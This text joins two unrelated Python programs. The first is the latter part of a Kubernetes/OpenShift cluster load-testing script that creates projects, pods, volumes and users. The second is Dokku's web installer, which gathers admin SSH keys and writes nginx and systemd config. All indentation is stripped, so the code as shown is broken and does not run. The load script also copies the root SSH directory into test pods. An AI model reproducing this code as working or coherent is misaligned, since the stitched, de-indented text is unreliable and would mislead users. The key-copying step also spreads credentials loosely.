namespace = globalvars["namespace"]
try:
oc_command("oc delete configmap %s -n %s" % (cm_targets, namespace), globalvars)
except subprocess.CalledProcessError:
pass
ret = oc_command("oc get routes --all-namespaces --no-headers | awk '{print $3}' | oc create configmap %s --from-file=wlg-targets=/dev/stdin -n %s" %
(cm_targets, namespace), globalvars)
return ret
def create_service(servconfig, num, globalvars):
if globalvars["debugoption"]:
print "create_service function called"
data = {}
timings = {}
data = servconfig
i = 0
while i < int(num):
tmpfile=tempfile.NamedTemporaryFile()
dataserv = copy.deepcopy(data)
servicename = dataserv["metadata"]["name"] + str(i)
dataserv["metadata"]["name"] = servicename
json.dump(dataserv, tmpfile)
tmpfile.flush()
if globalvars["kubeopt"]:
check = oc_command("kubectl create -f " + tmpfile.name, \
globalvars)
else:
check = oc_command("oc create -f " + tmpfile.name, \
globalvars)
i = i + 1
del (dataserv)
tmpfile.close()
def create_pods(podcfg, num, storagetype, globalvars):
if globalvars["debugoption"]:
print "create_pods function called"
namespace = podcfg["metadata"]["namespace"]
data = {}
timings = {}
data = podcfg
i = 0
pend_pods = globalvars["pend_pods"]
while i < int(num):
if storagetype in ("ebs", "EBS"):
# it is necessary to create ebs/pv/pvc for every pod, and pod file has to updated dinamically
ebs_create(globalvars)
tmpfile=tempfile.NamedTemporaryFile()
datapod = copy.deepcopy(data)
podname = datapod["metadata"]["name"] + str(i)
datapod["metadata"]["name"] = podname
datapod["spec"]["containers"][0]["volumeMounts"] = [{"mountPath" : mountdir ,"name": ebsvolumeid }]
datapod["spec"]["volumes"] = [{"name": ebsvolumeid, "persistentVolumeClaim": { "claimName": ebsvolumeid }}]
# update pod
globalvars["curprojenv"]["pods"].append(podname)
json.dump(datapod, open("podfilexample.json", "w+"), sort_keys=True, indent=4, separators=(',', ': '))
json.dump(datapod, tmpfile)
tmpfile.flush()
elif storagetype in ("ceph", "CEPH"):
ceph_image_create(i,globalvars) # this will create pv/pvc/image - one at time
tmpfile = tempfile.NamedTemporaryFile()
datapod = copy.deepcopy(data)
podname = datapod["metadata"]["name"] + str(i)
datapod["metadata"]["name"] = podname
datapod["spec"]["containers"][0]["volumeMounts"] = [{"mountPath" : mountdir , "name": "cephvol" + str(i) }]
datapod["spec"]["volumes"] = [{"name": "cephvol" + str(i) , "persistentVolumeClaim": { "claimName": "cephclaim" + str(i) }}]
# update pod
globalvars["curprojenv"]["pods"].append(podname)
json.dump(datapod, open("podfilexample.json", "w+"), sort_keys=True, indent=4, separators=(',', ': '))
json.dump(datapod, tmpfile)
tmpfile.flush()
"""
# do here ceph pv test configuration
elif storagetype in ("nfs", "NFS"):
# do here nfs pv test configuration
elif storagetype in ("gluster", "GLUSTER"):
# do here gluster configuration
"""
# here will be added ceph_create/gluster_create / nfs_create / iscsi_create storage backends
else:
tmpfile=tempfile.NamedTemporaryFile()
datapod = copy.deepcopy(data)
podname = datapod["metadata"]["name"] + str(i)
datapod["metadata"]["name"] = podname
globalvars["curprojenv"]["pods"].append(podname)
json.dump(datapod, tmpfile)
tmpfile.flush()
if globalvars["kubeopt"]:
found = False
while not found:
check = oc_command("kubectl get serviceaccounts --namespace " + namespace, globalvars)
if "default" in check:
found = True
check = oc_command("kubectl create --validate=false -f " \
+ tmpfile.name, globalvars)
else:
check = oc_command("oc create -f " + tmpfile.name, \
globalvars)
pend_pods.append(podname)
if "tuningset" in globalvars:
if "stepping" in globalvars["tuningset"]:
stepsize = globalvars["tuningset"]["stepping"]["stepsize"]
pause = globalvars["tuningset"]["stepping"]["pause"]
globalvars["totalpods"] = globalvars["totalpods"] + 1
total_pods_created = int(globalvars["totalpods"])
if total_pods_created % stepsize == 0 and globalvars["tolerate"] is False:
pod_data(globalvars)
time.sleep(calc_time(pause))
if "rate_limit" in globalvars["tuningset"]:
delay = globalvars["tuningset"]["rate_limit"]["delay"]
time.sleep(calc_time(delay))
i = i + 1
del (datapod)
tmpfile.close()
def pod_data(globalvars):
if globalvars["debugoption"]:
print "pod_data function called"
pend_pods = globalvars["pend_pods"]
namespace = globalvars["namespace"]
while len(pend_pods) > 0:
if globalvars["kubeopt"]:
getpods = oc_command("kubectl get pods --namespace " + namespace, globalvars)
else:
getpods = oc_command("oc get pods -n " + namespace, globalvars)
all_status = getpods.split("\n")
size = len(all_status)
all_status = all_status[1:size - 1]
for status in all_status:
fields = status.split()
if fields[2] == "Running" and fields[0] in pend_pods:
pend_pods.remove(fields[0])
if len(pend_pods) > 0:
time.sleep(5)
def create_rc(rc_config, num, globalvars):
if globalvars["debugoption"]:
print "create_rc function called"
i = 0
data = rc_config
basename = rc_config["metadata"]["name"]
while i < num:
tmpfile=tempfile.NamedTemporaryFile()
curdata = copy.deepcopy(data)
newname = basename + str(i)
globalvars["curprojenv"]["rcs"].append(newname)
curdata["metadata"]["name"] = newname
curdata["spec"]["selector"]["name"] = newname
curdata["spec"]["template"]["metadata"]["labels"]["name"] = newname
json.dump(curdata, tmpfile)
tmpfile.flush()
if globalvars["kubeopt"]:
oc_command("kubectl create -f " + tmpfile.name, globalvars)
else:
oc_command("oc create -f " + tmpfile.name, globalvars)
i = i + 1
del (curdata)
tmpfile.close()
def create_user(usercfg, globalvars):
if globalvars["debugoption"]:
print "create_user function called"
namespace = globalvars["namespace"]
basename = usercfg["basename"]
num = int(usercfg["num"])
role = usercfg["role"]
password = usercfg["password"]
passfile = usercfg["userpassfile"]
i = 0
while i < num:
name = basename + str(i)
globalvars["curprojenv"]["users"].append(name)
# TO BE DISCUSSED
# cmdstring = "id -u " + name + " &>/dev/null | useradd " + name
# subprocess.check_call(cmdstring, shell=True)
if not os.path.isfile(passfile):
subprocess.check_call("touch " + passfile, shell = True)
subprocess.check_call("htpasswd -b " + passfile + " " + name + " " + \
password, shell=True)
oc_command("oc adm policy add-role-to-user " + role + " " + name + \
" -n " + namespace, globalvars)
print "Created User: " + name + " :: " + "Project: " + namespace + \
" :: " + "role: " + role
i = i + 1
def project_exists(projname, globalvars) :
exists = False
try :
cmd = "kubectl" if globalvars["kubeopt"] else "oc"
output = oc_command(cmd + " get project -o name " + projname, globalvars).rstrip()
if output.endswith(projname) :
exists = True
except subprocess.CalledProcessError : # this is ok, means the project does not already exist
pass
return exists
def delete_project(projname, globalvars) :
# Check if the project exists
cmd = "kubectl" if globalvars["kubeopt"] else "oc"
oc_command(cmd + " delete project " + projname, globalvars)
# project deletion is asynch from resource deletion. command returns before project is really gone
retries = 0
while project_exists(projname,globalvars) and (retries < 10) :
retries += 1
print "Project " + projname + " still exists, waiting 10 seconds"
time.sleep(10)
# not deleted after retries, bail out
if project_exists(projname,globalvars) :
raise RuntimeError("Failed to delete project " + projname)
def single_project(testconfig, projname, globalvars):
globalvars["createproj"] = True
if project_exists(projname,globalvars) :
if testconfig["ifexists"] == "delete" :
delete_project(projname,globalvars)
elif testconfig["ifexists"] == "reuse" :
globalvars["createproj"] = False
else:
print "ERROR: Project " + projname + " already exists. \
Use ifexists=reuse/delete in config"
return
if globalvars["createproj"]:
if globalvars["kubeopt"]:
tmpfile=tempfile.NamedTemporaryFile()
with open("content/namespace-default.yaml") as infile:
nsconfig = yaml.load(infile)
nsconfig["metadata"]["name"] = projname
with open(tmpfile.name, 'w+') as f:
yaml.dump(nsconfig, f, default_flow_style=False)
tmpfile.flush()
oc_command("kubectl create -f %s" % tmpfile.name,globalvars)
oc_command("kubectl label --overwrite namespace " + projname +" purpose=test", globalvars)
else:
oc_command("oc new-project " + projname,globalvars)
oc_command("oc label --overwrite namespace " + projname +" purpose=test", globalvars)
else:
pass
time.sleep(1)
projenv={}
if "tuningset" in globalvars:
tuningset = globalvars["tuningset"]
if "tuning" in testconfig:
projenv["tuning"] = testconfig["tuning"]
globalvars["curprojenv"] = projenv
globalvars["namespace"] = projname
if "quota" in testconfig:
quota_handler(testconfig["quota"],globalvars)
if "templates" in testconfig:
template_handler(testconfig["templates"], globalvars)
if "services" in testconfig:
service_handler(testconfig["services"], globalvars)
if "users" in testconfig:
user_handler(testconfig["users"], globalvars)
if "pods" in testconfig:
if "pods" in tuningset:
globalvars["tuningset"] = tuningset["pods"]
pod_handler(testconfig["pods"], globalvars)
if "rcs" in testconfig:
rc_handler(testconfig["rcs"], globalvars)
if globalvars["autogen"]:
autogen_pod_handler(globalvars)
def autogen_pod_handler(globalvars):
num_expected = int(globalvars["podnum"])
pods_running = []
pods_running = autogen_pod_wait(pods_running, num_expected)
for pod in pods_running:
rsync = subprocess.check_output(
"oc rsync --namespace=%s /root/.ssh %s:/root/" \
% (pod[0], pod[1]), shell=True)
app = Flask(__name__)
@app.route("/start")
def hello():
return "Hello"
@app.route("/stop", methods=["POST"])
def shutdown_server():
func = request.environ.get("werkzeug.server.shutdown")
if func is None:
raise RuntimeError("Not running with the Werkzeug Server")
func()
def start_ws():
app.run(host="0.0.0.0", port=9090, threaded=True)
proc = Process(target=start_ws)
proc.start()
autogen_pod_wait(pods_running, 0)
if proc.is_alive():
proc.terminate()
proc.join()
print "Load completed"
def autogen_pod_wait(pods_running, num_expected):
while len(pods_running) != num_expected:
pods_running = subprocess.check_output(
"oc get pods --all-namespaces --selector=test --no-headers | "
" awk '/1\/1/ && /Running/ {print $1,$2;}'", shell=True).splitlines()
time.sleep(5)
pods_running = [pod.split() for pod in pods_running]
return pods_running
def project_handler(testconfig, globalvars):
if globalvars["debugoption"]:
print "project_handler function called"
total_projs = testconfig["num"]
basename = testconfig["basename"]
globalvars["env"] = []
maxforks = globalvars["processes"]
projlist = []
i = 0
while i < int(total_projs):
j=0
children = []
while j < int(maxforks) and i < int(total_projs):
j=j+1
pid = os.fork()
if pid:
children.append(pid)
i = i + 1
else:
projname = basename
if "ifexists" not in testconfig:
print "Parameter 'ifexists' not specified. Using 'default' value."
testconfig["ifexists"] = "default"
if testconfig["ifexists"] != "reuse" :
projname = basename + str(i)
print "forking %s"%projname
single_project(testconfig, projname, globalvars)
os._exit(0)
for k, child in enumerate(children):
os.waitpid(child, 0)
def quota_handler(inputquota, globalvars):
if globalvars["debugoption"]:
print "Function :: quota_handler"
quota = globalvars["quota"]
quotafile = quota["file"]
if quotafile == "default":
quotafile = "content/quota-default.json"
with open(quotafile,'r') as infile:
qconfig = json.load(infile)
qconfig["metadata"]["namespace"] = globalvars["namespace"]
qconfig["metadata"]["name"] = quota["name"]
tmpfile=tempfile.NamedTemporaryFile()
json.dump(qconfig,tmpfile)
tmpfile.flush()
if globalvars["kubeopt"]:
oc_command("kubectl create -f " + tmpfile.name, globalvars)
else:
oc_command("oc create -f " + tmpfile.name, globalvars)
tmpfile.close()
def template_handler(templates, globalvars):
if globalvars["debugoption"]:
print "template_handler function called"
print "templates: ", templates
for template in templates:
num = int(template["num"])
templatefile = template["file"]
if "parameters" in template:
parameters = template["parameters"]
else:
parameters = None
if "tuningset" in globalvars:
if "templates" in globalvars["tuningset"]:
if "stepping" in globalvars["tuningset"]["templates"]:
globalvars["totaltemplates"] = 0
create_template(templatefile, num, parameters, globalvars)
if "totaltemplates" in globalvars:
del (globalvars["totaltemplates"])
def service_handler(inputservs, globalvars):
if globalvars["debugoption"]:
print "service_handler function called"
namespace = globalvars["namespace"]
globalvars["curprojenv"]["services"] = []
for service in inputservs:
num = int(service["num"])
servfile = service["file"]
basename = service["basename"]
if servfile == "default":
servfile = "content/service-default.json"
service_config = {}
with open(servfile) as stream:
service_config = json.load(stream)
service_config["metadata"]["namespace"] = namespace
service_config["metadata"]["name"] = basename
create_service(service_config, num, globalvars)
def ebs_create(globalvars):
# just calling this function to create EBS, pv and pvc, EBS volume id == pv name == pvc name
# names does not influence anything
namespace = globalvars["namespace"]
globalvars["curprojenv"]["services"] = []
global ebsvolumeid
ebsvolumeid = ec2_volume(ebsvolumesize,ebsvtype,ebstagprefix,ebsregion)
with open("content/pv-default.json", "r") as pvstream:
pvjson = json.load(pvstream)
pvjson["metadata"]["name"] = ebsvolumeid
pvjson["spec"]["capacity"]["storage"] = str(ebsvolumesize) + "Gi" # this has to be like this till k8s 23357 is fixed
pvjson["spec"]["accessModes"] = [pvpermissions]
pvjson["spec"]["awsElasticBlockStore"]["volumeID"] = ebsvolumeid
pvjson["spec"]["awsElasticBlockStore"]["fsType"] = fstype
pvtmpfile = tempfile.NamedTemporaryFile(delete=True)
json.dump(pvjson,open("pvebsexample.json", "w+"), sort_keys=True, indent=4, separators=(',', ': '))
json.dump(pvjson,pvtmpfile,sort_keys=True, indent=4, separators=(',', ': '))
pvtmpfile.flush()
if globalvars["kubeopt"]:
check = oc_command("kubectl create -f " + pvtmpfile.name, globalvars)
else:
check = oc_command("oc create -f " + pvtmpfile.name , globalvars)
pvtmpfile.close()
with open("content/pvc-default.json", "r") as pvcstream:
pvcjson = json.load(pvcstream)
pvcjson["metadata"]["name"] = ebsvolumeid
pvcjson["metadata"]["namespace"] = namespace
pvcjson["spec"]["resources"]["requests"]["storage"] = str(ebsvolumesize) + "Gi"
pvcjson["spec"]["accessModes"] = [pvcpermissions]
pvctmpfile = tempfile.NamedTemporaryFile(delete=True)
json.dump(pvcjson, open("pvcebsexample.json", "w+"), sort_keys=True, indent=4, separators=(',', ': '))
json.dump(pvcjson,pvctmpfile,sort_keys=True, indent=4, separators=(',', ': '))
pvctmpfile.flush()
if globalvars["kubeopt"]:
check = oc_command("kubectl create -f " + pvctmpfile.name, globalvars)
# why we have both kubectl and oc? kubectl will to all
else:
check = oc_command("oc create -f " + pvctmpfile.name, globalvars)
pvctmpfile.close()
# this function creates CEPH secret
def ceph_secret_create(cephsecret,globalvars):
namespace = globalvars["namespace"]
with open("content/ceph-secret.json") as cephsec:
cephsecjson = json.load(cephsec)
cephsecjson["metadata"]["name"] = cephsecretname
cephsecjson["metadata"]["namespace"] = namespace
cephsecjson["data"]["key"] = cephsecret
sectmpfile = tempfile.NamedTemporaryFile(delete=True)
json.dump(cephsecjson, open("cephseckey.json", "w+"), sort_keys=True, indent=4, separators=(',', ': '))
json.dump(cephsecjson, sectmpfile, sort_keys=True, indent=4, separators=(',', ': '))
sectmpfile.flush()
# create ceph sec
if globalvars["kubeopt"]:
check = oc_command("kubectl create -f " + sectmpfile.name, globalvars)
else:
check = oc_command("oc create -f " + sectmpfile.name, globalvars)
sectmpfile.close()
# this function will create pv/pvc based on ceph image
def ceph_image_create(i,globalvars):
"""
This function will prepare pv/pvc file for case when pods
will use gluster volume for persistent storage
"""
namespace = globalvars["namespace"]
globalvars["curprojenv"]["services"] = []
cephimagename = "cephimage" + str(i)
imagesize = 1024**3*int(cephimagesize)
# ceph_volume function will create ceph images at ceph storage cluster side
ceph_volume(cephpool,cephimagename,imagesize)
with open("content/pv-ceph.json") as pvstream:
pvjson = json.load(pvstream)
pvjson["metadata"]["name"] = "cephvol" + str(i)
pvjson["metadata"]["namespace"] = namespace
pvjson["spec"]["capacity"]["storage"] = str(cephimagesize) + "Gi" # this has to be like this till k8s 23357 is fixed
pvjson["spec"]["accessModes"] = [pvpermissions]
pvjson["spec"]["rbd"]["monitors"] = [x + str(":") + str(6789) for x in cephmonitors]
pvjson["spec"]["rbd"]["pool"] = cephpool
pvjson["spec"]["rbd"]["image"] = "cephimage" + str(i)
pvjson["spec"]["rbd"]["user"] = "admin"
pvjson["spec"]["rbd"]["secretRef"]["name"] = cephsecretname
pvtmpfile = tempfile.NamedTemporaryFile(delete=True)
json.dump(pvjson,open("pvcephexample.json", "w+"), sort_keys=True, indent=4, separators=(',', ': '))
json.dump(pvjson,pvtmpfile,sort_keys=True, indent=4, separators=(',', ': '))
pvtmpfile.flush()
# create pv
if globalvars["kubeopt"]:
check = oc_command("kubectl create -f " + pvtmpfile.name, globalvars)
else:
check = oc_command("oc create -f " + pvtmpfile.name , globalvars)
pvtmpfile.close()
with open("content/pvc-default.json", "r") as pvcstream:
pvcjson = json.load(pvcstream)
pvcjson["metadata"]["name"] = "cephclaim" + str(i)
pvcjson["metadata"]["namespace"] = namespace
pvcjson["spec"]["resources"]["requests"]["storage"] = str(cephimagesize) + "Gi"
pvcjson["spec"]["accessModes"] = [pvcpermissions]
pvctmpfile = tempfile.NamedTemporaryFile(delete=True)
json.dump(pvcjson, open("pvccephexample.json", "w+"), sort_keys=True, indent=4, separators=(',', ': '))
json.dump(pvcjson,pvctmpfile,sort_keys=True, indent=4, separators=(',', ': '))
pvctmpfile.flush()
if globalvars["kubeopt"]:
check = oc_command("kubectl create -f " + pvctmpfile.name, globalvars)
# why we have both kubectl and oc? kubectl will to all
else:
check = oc_command("oc create -f " + pvctmpfile.name, globalvars)
pvctmpfile.close()
# gluster_image_create and nfs_image_create will be added
"""
def gluster_image_create():
"""
"""
def nfs_image_create():
"""
def pod_handler(inputpods, globalvars):
if globalvars["debugoption"]:
print "pod_handler function called"
namespace = globalvars["namespace"]
total_pods = int(inputpods[0]["total"])
inputpods = inputpods[1:]
storage = inputpods[0]["storage"]
global storagetype,ebsvolumesize, ebsvtype, ebsregion, ebstagprefix, mountdir, \
pvpermissions, pvcpermissions, nfsshare, nfsip, volumesize, glustervolume, \
glusterip, cephpool , cephmonitors, cephimagesize, cephsecret, cephsecretname, fstype
if storage[0]["type"] in ("none", "None", "n"):
storagetype = storage[0]["type"]
print ("If storage type is set to None, then pods will not have persistent storage")
elif storage[0]["type"] in ("ebs", "EBS"):
storagetype = storage[0]["type"]
ebsvolumesize = storage[0]["ebsvolumesize"]
ebsvtype = storage[0]["ebsvtype"]
ebsregion = storage[0]["ebsregion"]
ebstagprefix = storage[0]["ebstagprefix"]
mountdir = storage[0]["mountdir"]
fstype = storage[0]["fstype"]
pvpermissions = storage[0]["pvpermissions"]
pvcpermissions = storage[0]["pvcpermissions"]
print ("Storage type EBS specified, ensure that OSE master/nodes are configured to reach EC2")
elif storage[0]["type"] in ("nfs", "NFS"):
storagetype = storage[0]["type"]
nfsshare = storage[0]["nfsshare"]
nfsip = storage[0]["nfsip"]
mountdir = storage[0]["mountdir"]
volumesize = storage[0]["volumesize"]
fstype = storage[0]["fstype"]
pvpermissions = storage[0]["pvpermissions"]
pvcpermissions = storage[0]["pvcpermissions"]
print ("NFS storage backend specified, ensure that access to NFS with ip", nfsip, "works properly")
elif storage[0]["type"] in ("gluster", "GLUSTER"):
storagetype = storage[0]["type"]
glustervolume = storage[0]["glustervolume"]
glusterip = storage[0]["glusterip"]
mountdir = storage[0]["mountdir"]
volumesize = storage[0]["volumesize"]
fstype = storage[0]["fstype"]
pvpermissions = storage[0]["pvpermissions"]
pvcpermissions = storage[0]["pvcpermissions"]
print ("Storage type Gluster specified, ensure access to Gluster servers", glusterip, "works properly")
elif storage[0]["type"] in ("ceph", "CEPH"):
storagetype = storage[0]["type"]
cephpool = storage[0]["cephpool"]
cephmonitors = storage[0]["cephmonitors"]
cephimagesize = storage[0]["cephimagesize"]
cephsecretname = storage[0]["cephsecretname"]
cephsecret = storage[0]["cephsecret"]
mountdir = storage[0]["mountdir"]
fstype = storage[0]["fstype"]
pvpermissions = storage[0]["pvpermissions"]
pvcpermissions = storage[0]["pvcpermissions"]
# if CEPH is specified, we have to create ceph secret on OSE master
# before creating pv/pvc/pod, secrete needs to be created
# only once , treating this as one time run variable
ceph_secret_create(cephsecret,globalvars)
print ("Storage type CEPH specified, ensure that OSE master is configured to reach CEPH cluster and ceph monitors", cephmonitors)
globalvars["curprojenv"]["pods"] = []
if "tuningset" in globalvars:
globalvars["podtuningset"] = globalvars["tuningset"]
globalvars["pend_pods"] = []
if "podtuningset" in globalvars:
if "stepping" in globalvars["podtuningset"]:
globalvars["totalpods"] = 0
for podcfg in inputpods:
num = int(podcfg["num"]) * total_pods / 100
podfile = podcfg["file"]
basename = podcfg["basename"]
if podfile == "default":
podfile = "content/pod-default.json"
pod_config = {}
with open(podfile) as stream:
pod_config = json.load(stream)
pod_config["metadata"]["namespace"] = namespace
pod_config["metadata"]["name"] = basename
create_pods(pod_config, num,storagetype, globalvars)
if globalvars["tolerate"] is False:
if len(globalvars["pend_pods"]) > 0:
pod_data(globalvars)
if "podtuningset" in globalvars:
del(globalvars["podtuningset"])
del(globalvars["totalpods"])
del(globalvars["pend_pods"])
def rc_handler(inputrcs, globalvars):
if globalvars["debugoption"]:
print "rc_handler function called"
namespace = globalvars["namespace"]
globalvars["curprojenv"]["rcs"] = []
for rc_cfg in inputrcs:
num = int(rc_cfg["num"])
replicas = int(rc_cfg["replicas"])
rcfile = rc_cfg["file"]
basename = rc_cfg["basename"]
image = rc_cfg["image"]
if rcfile == "default":
rcfile = "content/rc-default.json"
rc_config = {}
with open(rcfile) as stream:
rc_config = json.load(stream)
rc_config["metadata"]["namespace"] = namespace
rc_config["metadata"]["name"] = basename
rc_config["spec"]["replicas"] = replicas
rc_config["spec"]["template"]["spec"]["containers"][0]["image"] = image
create_rc(rc_config, num,globalvars)
def user_handler(inputusers, globalvars):
if globalvars["debugoption"]:
print "user_handler function called"
globalvars["curprojenv"]["users"] = []
for user in inputusers:
create_user(user, globalvars)
def find_tuning(tuningsets, name):
for tuningset in tuningsets:
if tuningset["name"] == name:
return tuningset
else:
continue
print "Failed to find tuningset: " + name + "\nExiting....."
sys.exit()
def find_quota(quotaset, name):
for quota in quotaset:
if quota["name"] == name:
return quota
else:
continue
print "Failed to find quota : " + name + "\nExitting ......"
sys.exit()
|
dokku-installer.py
|
#!/usr/bin/env python3
import cgi
import json
import os
import re
try:
import SimpleHTTPServer
import SocketServer
except ImportError:
import http.server as SimpleHTTPServer
import socketserver as SocketServer
import subprocess
import sys
import threading
VERSION = 'v0.19.10'
def bytes_to_string(b):
if type(b) == bytes:
encoding = sys.stdout.encoding
if encoding is None:
encoding = 'utf-8'
b = b.decode(encoding)
b = b.strip()
return b
def string_to_bytes(s):
if type(s) == str:
encoding = sys.stdout.encoding
if encoding is None:
encoding = 'utf-8'
s = s.encode(encoding)
return s
hostname = ''
try:
command = "bash -c '[[ $(dig +short $HOSTNAME) ]] && echo $HOSTNAME || wget -q -O - icanhazip.com'"
hostname = bytes_to_string(subprocess.check_output(command, shell=True))
except subprocess.CalledProcessError:
pass
key_file = os.getenv('KEY_FILE', None)
if os.path.isfile('/home/ec2-user/.ssh/authorized_keys'):
key_file = '/home/ec2-user/.ssh/authorized_keys'
elif os.path.isfile('/home/ubuntu/.ssh/authorized_keys'):
key_file = '/home/ubuntu/.ssh/authorized_keys'
else:
key_file = '/root/.ssh/authorized_keys'
admin_keys = []
if os.path.isfile(key_file):
try:
command = "cat {0}".format(key_file)
admin_keys = bytes_to_string(subprocess.check_output(command, shell=True)).strip().split("\n")
except subprocess.CalledProcessError:
pass
ufw_display = 'block'
try:
command = "sudo ufw status"
ufw_output = bytes_to_string(subprocess.check_output(command, shell=True).strip())
if "inactive" in ufw_output:
ufw_display = 'none'
except subprocess.CalledProcessError:
ufw_display = 'none'
nginx_dir = '/etc/nginx'
nginx_init = '/etc/init.d/nginx'
try:
command = "test -x /usr/bin/openresty"
subprocess.check_output(command, shell=True)
nginx_dir = '/usr/local/openresty/nginx/conf'
nginx_init = '/etc/init.d/openresty'
except subprocess.CalledProcessError:
pass
def check_boot():
if 'onboot' not in sys.argv:
return
init_dir = os.getenv('INIT_DIR', '/etc/init')
systemd_dir = os.getenv('SYSTEMD_DIR', '/etc/systemd/system')
nginx_conf_dir = os.getenv('NGINX_CONF_DIR', '{0}/conf.d'.format(nginx_dir))
if os.path.exists(init_dir):
with open('{0}/dokku-installer.conf'.format(init_dir), 'w') as f:
f.write("start on runlevel [2345]\n")
f.write("exec {0} selfdestruct\n".format(os.path.abspath(__file__)))
if os.path.exists(systemd_dir):
with open('{0}/dokku-installer.service'.format(systemd_dir), 'w') as f:
f.write("[Unit]\n")
f.write("Description=Dokku web-installer\n")
f.write("\n")
f.write("[Service]\n")
f.write("ExecStart={0} selfdestruct\n".format(os.path.abspath(__file__)))
f.write("\n")
f.write("[Install]\n")
f.write("WantedBy=multi-user.target\n")
f.write("WantedBy=graphical.target\n")
if os.path.exists(nginx_conf_dir):
with open('{0}/dokku-installer.conf'.format(nginx_conf_dir), 'w') as f:
f.write("upstream dokku-installer { server 127.0.0.1:2000; }\n")
f.write("server {\n")
f.write(" listen 80;\n")
f.write(" location / {\n")
f.write(" proxy_pass http://dokku-installer;\n")
f.write(" }\n")
f.write("}\n")
subprocess.call('rm -f {0}/sites-enabled/*'.format(nginx_dir), shell=True)
sys.exit(0)
class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def write_content(self, content):
try:
self.wfile.write(content)
except TypeError:
self.wfile.write(string_to_bytes(content))
def do_GET(self):
content = PAGE.replace('{VERSION}', VERSION)
content = content.replace('{UFW_DISPLAY}', ufw_display)
content = content.replace('{HOSTNAME}', hostname)
content = content.replace('{AUTHORIZED_KEYS_LOCATION}', key_file)
content = content.replace('{ADMIN_KEYS}', "\n".join(admin_keys))
self.send_response(200)
self.end_headers()
self.write_content(content)
def do_POST(self):
if self.path not in ['/setup', '/setup/']:
return
params = cgi.FieldStorage(fp=self.rfile,
headers=self.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type']})
vhost_enable = 'false'
dokku_root = os.getenv('DOKKU_ROOT', '/home/dokku')
if 'vhost' in params and params['vhost'].value == 'true':
vhost_enable = 'true'
with open('{0}/VHOST'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
else:
try:
os.remove('{0}/VHOST'.format(dokku_root))
except OSError:
pass
with open('{0}/HOSTNAME'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
for (index, key) in enumerate(params['keys'].value.splitlines(), 1):
user = 'admin'
if self.admin_user_exists() is not None:
user = 'web-admin'
if self.web_admin_user_exists() is not None:
index = int(self.web_admin_user_exists()) + 1
elif self.web_admin_user_exists() is None:
index = 1
elif self.admin_user_exists() is None:
pass
else:
index = int(self.admin_user_exists()) + 1
user = user + str(index)
command = ['sshcommand', 'acl-add', 'dokku', user]
proc = subprocess.Popen(command, stdin=subprocess.PIPE)
try:
proc.stdin.write(key)
except TypeError:
proc.stdin.write(string_to_bytes(key))
proc.stdin.close()
proc.wait()
set_debconf_selection('boolean', 'nginx_enable', 'true')
set_debconf_selection('boolean', 'skip_key_file', 'true')
set_debconf_selection('boolean', 'vhost_enable', vhost_enable)
set_debconf_selection('boolean', 'web_config', 'false')
set_debconf_selection('string', 'hostname', params['hostname'].value)
if 'selfdestruct' in sys.argv:
DeleteInstallerThread()
content = json.dumps({'status': 'ok'})
self.send_response(200)
self.end_headers()
self.write_content(content)
def web_admin_user_exists(self):
return self.user_exists('web-admin(\d+)')
def admin_user_exists(self):
return self.user_exists('admin(\d+)')
def user_exists(self, name):
command = 'dokku ssh-keys:list'
pattern = re.compile(r'NAME="' + name + '"')
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
max_num = 0
exists = False
for line in proc.stdout:
m = pattern.search(bytes_to_string(line))
if m:
# User of the form `user` or `user#` exists
exists = True
max_num = max(max_num, int(m.group(1)))
if exists:
return max_num
else:
return None
def set_debconf_selection(debconf_type, key, value):
found = False
with open('/etc/os-release', 'r') as f:
for line in f:
if 'debian' in line:
found = True
if not found:
return
ps = subprocess.Popen(['echo', 'dokku dokku/{0} {1} {2}'.format(
key, debconf_type, value
)], stdout=subprocess.PIPE)
try:
subprocess.check_output(['debconf-set-selections'], stdin=ps.stdout)
except subprocess.CalledProcessError:
pass
ps.wait()
class DeleteInstallerThread(object):
def __init__(self, interval=1):
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
command = "rm {0}/conf.d/dokku-installer.conf && {1} stop && {1} start".format(nginx_dir, nginx_init)
try:
subprocess.call(command, shell=True)
except:
pass
command = "rm -f /etc/init/dokku-installer.conf /etc/systemd/system/dokku-installer.service && (stop dokku-installer || systemctl stop dokku-installer.service)"
try:
subprocess.call(command, shell=True)
except:
pass
def main():
check_boot()
port = int(os.getenv('PORT', 2000))
httpd = SocketServer.TCPServer(("", port), GetHandler)
print("Listening on 0.0.0.0:{0}, CTRL+C to stop".format(port))
httpd.serve_forever()
PAGE = """
<html>
<head>
<meta charset="utf-8" />
<title>Dokku Setup</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
<style>
.bd-callout {
padding: 1.25rem;
margin-top: 1.25rem;
margin-bottom: 1.25rem;
border: 1px solid #eee;
border-left-width: .25rem;
border-radius: .25rem;
}
.bd-callout p:last-child {
margin-bottom: 0;
}
.bd-callout-info {
border-left-color: #5bc0de;
}
pre {
font-size: 80%;
margin-bottom: 0;
}
h1 small {
font-size: 50%;
}
h5 {
font-size: 1rem;
}
.container {
width: 640px;
}
.result {
padding-left: 20px;
}
input.form-control, textarea.form-control {
background-color: #fafbfc;
font-size: 14px;
}
input.form-control::placeholder, textarea.form-control::placeholder {
color: #adb2b8
}
</style>
</head>
<body>
<div class="container">
<form id="form" role="form">
<h1 class="pt-3">Dokku Setup <small class="text-muted">{VERSION}</small></h1>
<div class="alert alert-warning small" role="alert">
<strong>Warning:</strong> The SSH key filled out here can grant root access to the server. Please complete the setup as soon as possible.
</div>
<div class="row">
<div class="col">
<h3>Admin Access</h3>
<div class="form-group">
<label for="key">Public SSH Keys</label><br />
<textarea class="form-control" name="keys" rows="5" id="key" placeholder="Begins with 'ssh-rsa', 'ssh-dss', 'ssh-ed25519', 'ecdsa-sha2-nistp256', 'ecdsa-sha2-nistp384', or 'ecdsa-sha2-nistp521'">{ADMIN_KEYS}</textarea>
